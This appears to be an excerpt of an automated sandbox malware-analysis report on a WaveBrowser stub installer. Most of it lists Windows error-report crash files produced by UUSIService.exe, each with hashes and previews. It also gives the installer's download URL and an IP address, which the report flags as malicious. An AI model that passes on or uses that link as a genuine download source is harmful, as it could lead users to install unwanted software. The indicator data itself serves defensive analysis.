	https://wav-installers.s3.amazonaws.com/Stubs/WaveBrowser_Stub-v1.5.18.3-wpf.exe	Get hash	malicious	Unknown	Browse	104.21.54.163

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_26710e55-faff-4a78-b285-495e9cfe9a47\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9412277237681788
Encrypted:	false
SSDEEP:	96:TxFp9QMZ1yVHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS9+xM:tbpZ4VH70BU/Ka6DkzuiFsZ24IO8v
MD5:	85CEC89D217493566EF750D43E733974
SHA1:	5064CD21B054F242AD696D69833A483D9FA277F4
SHA-256:	D0EE704F3A0EC7A16CFD521A0CFDA1DA8AFCF9EE9E5E572613F497CF5466F252
SHA-512:	42E5638D9BF397800B81A81630CEEAFD16D41A136C772C8094ACBFE38AF8DFE500ECB6E51DE1509F8ECA4B8C38363F09957FB70A4CB44D06A2F5F0A7013839D7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.0.5.1.3.9.7.9.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.0.6.0.1.4.7.8.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.7.1.0.e.5.5.-.f.a.f.f.-.4.a.7.8.-.b.2.8.5.-.4.9.5.e.9.c.f.e.9.a.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.9.4.c.5.1.a.-.1.b.c.7.-.4.e.a.6.-.8.0.4.b.-.b.4.7.8.9.7.0.5.3.8.8.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.d.0.-.0.0.0.1.-.0.0.1.5.-.a.5.7.b.-.4.7.2.4.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_34405604-1e2a-41c7-9788-a059f91bfff0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9411153318638456
Encrypted:	false
SSDEEP:	96:qcFYYlrSQMZ1yqHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeSu:j1r4Z4qH70BU/Ka6DkzuiF9Z24IO8v
MD5:	D4BC7F2588EC9B7B020BCAE24A456276
SHA1:	9B172CF8548B2209C9761A34D48C1B93B9FEA5B1
SHA-256:	A4130853040F999E708C6E224E0C64FFC0E75CAC8928259B2917CB69EFE74065
SHA-512:	AD0E532C0BAF2C67BFE4696C80DAF2D15C700CF651EF75148F2F1D8285794D9ECBED6722930C9827DDD6692239C7A61C4008D1979EE719510BD61E3F74E2A406
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.7.2.0.0.8.0.5.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.7.2.8.5.1.8.1.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.4.0.5.6.0.4.-.1.e.2.a.-.4.1.c.7.-.9.7.8.8.-.a.0.5.9.f.9.1.b.f.f.f.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.1.a.1.a.b.e.-.c.4.9.2.-.4.0.1.a.-.8.a.4.b.-.4.3.b.0.5.e.c.9.6.3.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.c.-.0.0.0.1.-.0.0.1.5.-.0.b.4.2.-.4.9.4.c.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_42f0b9f2-5a6d-4b5f-be19-ef246380adb8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9412980871845027
Encrypted:	false
SSDEEP:	192:p/CPtPZ40/H70BU/Ka6DkzuiFsZ24IO8v:stPW0oBU/Ka+kzuiFsY4IO8v
MD5:	312D67263D9AC8B9A3B52D0D4E39694E
SHA1:	C54EE1A12C31EEAC2D368B95EDDFD494542C0E92
SHA-256:	94559374C5A3C968D6BF9906B161E3AB1A36FC62DCB8A03532334D41933DBDF6
SHA-512:	4BB0C828165500CE50A92C9F57754F29BAC08880FDCAEC1CA00AB8EEC4954D1D11EA769D46E99C1B7C362EA4C4970B0B04EE83A00C755AD35E0CC3D1604E9FC2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.4.2.7.7.0.9.7.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.4.3.1.7.7.2.3.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.f.0.b.9.f.2.-.5.a.6.d.-.4.b.5.f.-.b.e.1.9.-.e.f.2.4.6.3.8.0.a.d.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.6.c.5.f.a.9.-.b.7.4.8.-.4.9.5.0.-.b.5.6.8.-.9.4.d.4.5.9.6.c.6.c.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.7.0.-.0.0.0.1.-.0.0.1.5.-.7.6.1.9.-.a.2.3.a.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_48a084e1-6547-42d8-b8fa-3a314400b0ad\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9410267173501583
Encrypted:	false
SSDEEP:	96:b2Fq2rTQMZ1yKHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS9W:K8oXZ4KH70BU/Ka6DkzuiFHZ24IO8v
MD5:	DEDCF1EB99D4918AECFD1376061337DD
SHA1:	21E68AF9ABE20E344C194BB0318379836178E6BA
SHA-256:	07EE0FFA327E277EB6E551E6F23A4CAB36E429AB557353EB018A852F2DFFEB7F
SHA-512:	C3EBCADF3FCC537DD949DFD641C92FF990EA5F2934D444A3B9B126849E994581626BE55FD572FA56E26CA94DA761B5335F64420ECC158AB4CFA0F380ED7743BF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.2.8.3.6.9.8.5.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.2.8.4.1.6.7.3.3.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.a.0.8.4.e.1.-.6.5.4.7.-.4.2.d.8.-.b.8.f.a.-.3.a.3.1.4.4.0.0.b.0.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.b.2.6.5.2.e.-.8.0.d.d.-.4.c.7.6.-.a.3.8.3.-.4.f.4.2.6.5.f.3.f.c.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.0.-.0.0.0.1.-.0.0.1.5.-.d.f.7.a.-.a.5.1.7.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_8b8ae7a4-81ce-4e8c-bbc4-9214fd51239e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9411922067250768
Encrypted:	false
SSDEEP:	192:ttfFSZ4/7H70BU/KayDkzuiFsZ24IO8v:VSWDoBU/Ka2kzuiFsY4IO8v
MD5:	BD327282F6408EF5D1C9EA0FBE35A81D
SHA1:	1621EC5170373D630A5265468B2F041E2991E733
SHA-256:	C0579585AC4F490567910E9E4851C0E0A868D5950BBCCA5C7FF1AB6FF3F63E6C
SHA-512:	A5BAC2D6A6385D0D6B51102D1CA76740471806DF7E6BB3953F081D13095C25A10F62F8FF8267D2ECC2BFB61B4104B7357EE14F7D454C65A6A17B8F940A7DDD07
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.3.4.6.7.4.4.2.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.3.5.1.5.8.7.9.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.8.a.e.7.a.4.-.8.1.c.e.-.4.e.8.c.-.b.b.c.4.-.9.2.1.4.f.d.5.1.2.3.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.b.f.1.9.8.b.-.1.e.1.8.-.4.a.d.8.-.a.7.0.f.-.3.0.f.b.b.6.c.9.3.1.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.9.c.-.0.0.0.1.-.0.0.1.5.-.5.6.a.a.-.c.8.3.5.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_a93f8d17-45b3-446a-ab27-7f429962a5fb\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9409557131083998
Encrypted:	false
SSDEEP:	96:uvFOMl8G6N2QMZ1yMHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7f:sZ6NMZ4MH70BU/Ka6DkzuiFsZ24IO8v
MD5:	7B0797EAED831582719778391147CB5F
SHA1:	4BA83EB1685314BBE576352DCA63A4AE748804E8
SHA-256:	C0AE4726E55B59B20D39003A7FD30F8E985897B0FC6C8A0A296496854F453219
SHA-512:	239263C66E4B1E6684F6FD569C7A1406DDD8E7900E6E5E49FD72F28A59B433FAD812F8B56C77B01C2ECBA6A16AED677D69DEC91AA555D6F80A3DE859A9F29D88
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.1.3.5.7.6.3.7.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.1.4.0.6.0.7.5.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.3.f.8.d.1.7.-.4.5.b.3.-.4.4.6.a.-.a.b.2.7.-.7.f.4.2.9.9.6.2.a.5.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.0.9.e.3.a.0.-.6.2.9.e.-.4.a.9.1.-.a.4.d.1.-.3.e.0.e.a.0.4.e.c.d.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.1.c.-.0.0.0.1.-.0.0.1.5.-.4.0.7.9.-.2.8.2.9.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_eeedd8b0-beef-48c6-bd7c-591cb5ef94dc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9413739683769334
Encrypted:	false
SSDEEP:	96:/cFpUF0QMZ1yKHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS9W:04FiZ4KH70BU/Ka6DkzuiFHZ24IO8v
MD5:	4A49ECE17BE173FE897009FAE48577BF
SHA1:	BCE90E506D7C51D0A62848C7D534014E94CBC164
SHA-256:	3A4BE3A70847B95A8556037D239368159FF6C353EE59FE57DA8DEC3A82ACB6D5
SHA-512:	7EE9420A9756CCD92CFD6B91A54758927329AC54E8EDBD83D985CE79585EEDF5A8E953A39B5E33FC48FFF4F370680985B724505844D3B380A16BB7B981360459
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.2.7.5.6.5.5.3.8.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.2.7.6.2.1.7.8.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.e.d.d.8.b.0.-.b.e.e.f.-.4.8.c.6.-.b.d.7.c.-.5.9.1.c.b.5.e.f.9.4.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.b.2.a.6.3.6.-.7.4.a.6.-.4.f.5.9.-.8.7.b.b.-.3.7.c.9.c.1.2.f.6.d.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.5.-.2.c.f.0.-.b.9.1.2.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_fc274f58-3920-46f2-bedb-955044d36450\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9412792139609449
Encrypted:	false
SSDEEP:	96:6bOFc6pnaQMZ1ywHXQ9UUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeF:6CjnQZ4wH70BU/KaSDkzuiF9Z24IO8v
MD5:	B0146D93A38A95E5478BB0F0539B05D7
SHA1:	0E31648C148CEE51F555D57DD471B6FD1EE2D3F5
SHA-256:	59AC223EDBE2880F77515C460BD9D02241FCD6E784DF1D73292B50FB4959F6E9
SHA-512:	3E2CBDDCA1ECDBBBC720AA27F7B2698DA83D1EC0304A0D4A8B75C6CBF183939274194BD36E1B974924CC41A86CE94BBE12B3C7447AF54D6128D019FC6070EAFF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.0.8.3.6.3.8.3.7.1.5.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.0.8.3.6.4.7.9.0.2.7.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.2.7.4.f.5.8.-.3.9.2.0.-.4.6.f.2.-.b.e.d.b.-.9.5.5.0.4.4.d.3.6.4.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.b.5.7.0.f.1.-.0.e.0.a.-.4.c.9.8.-.a.4.f.6.-.3.1.e.4.d.e.8.9.5.f.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.U.S.I.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.1.0.-.0.0.0.1.-.0.0.1.5.-.2.4.d.3.-.6.d.4.7.b.6.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.c.a.2.e.4.3.e.c.f.f.8.f.4.0.f.8.c.2.f.6.0.d.a.b.6.2.6.4.d.d.0.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.b.5.8.5.6.b.3.8.5.3.c.f.e.4.e.c.c.5.e.2.5.f.f.1.a.7.a.a.6.0.5.a.f.a.c.0.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER371A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 08:18:54 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	188015
Entropy (8bit):	4.139308516136199
Encrypted:	false
SSDEEP:	1536:VCX065LTgg9GAqtU8tT4hCDxZ6k8VB1M/CXxb/Ia2FqHFRuBojRHQLMupN4uE2aJ:Vu95LTgi2tVvxMAa2F0Hir4uEqxyJg
MD5:	4954671AC7E5790B4139190C82402CC1
SHA1:	3051CBA84E81C4AFD728EE00DB4A7072670DF583
SHA-256:	10BED597E256A94F758FC7F6523B4BD11070F37D3DE3F6332BDFD940C2B61DFD
SHA-512:	8DFB9CA25B80B0F27922CC7ECE85E02A288E89E8C4F2C59A8838A2BA7CAB24CC4A406436C746C188D19278C8B5FEF5FF3F3E12F432F31FE082F56BA6FBD0E87F
Malicious:	false
Preview:	MDMP..a..... .......n..g........................x...........$............ ...9..........`.......8...........T............%.............4........... ...............................................................................eJ..............GenuineIntel............T...........m..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37F6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.690000752399227
Encrypted:	false
SSDEEP:	192:R6l7wVeJyD6Xc6Y2DgSU9wNFgmfZTkprA89bngsfsjNm:R6lXJG6Xc6Y9SU9wNFgmft8nzfl
MD5:	A3C728A39B844909C2FD289820331572
SHA1:	7DD4DC9C5DBFCB75F879B543388F4E630499E573
SHA-256:	32064DB30DF9B1F647ADBD4A0F0B95EF8BED3FD03C3E7A9FC9CF70FD32F40E0A
SHA-512:	907677D1BEDAD8033EA38ACAEBB2812BFC206BD1B55C306FB3C5008BA09E9F01143A80A2AF127C301E858EA21993C172338849B069AEA0FBDA288E8450F03CDF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3826.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4756
Entropy (8bit):	4.467667307793809
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI983WpW8VY0Ym8M4J6IEO7F/m+q8vuEONd/l9ie9d:uIjfCI7SG7VYJ6xpKLEVlsad
MD5:	0222013FCAB4E1DC4F57743CB9DF59BE
SHA1:	2E658545EF7E7EDAECFFFC3DC6D2E2D85C7B1466
SHA-256:	18F0C1C1C183428B2F68A028F2C90D1B5FA125F5026F1127F5842748689CC939
SHA-512:	102AC232D69E621B2A12B234A4BC37F3A809EE091FAB126F357E12B4EB33165B3125F9CC1DD4815CE9863CBB8AEC78A0778C3BAC0443B415545784E9AC9BF1D7
Malicious:	false
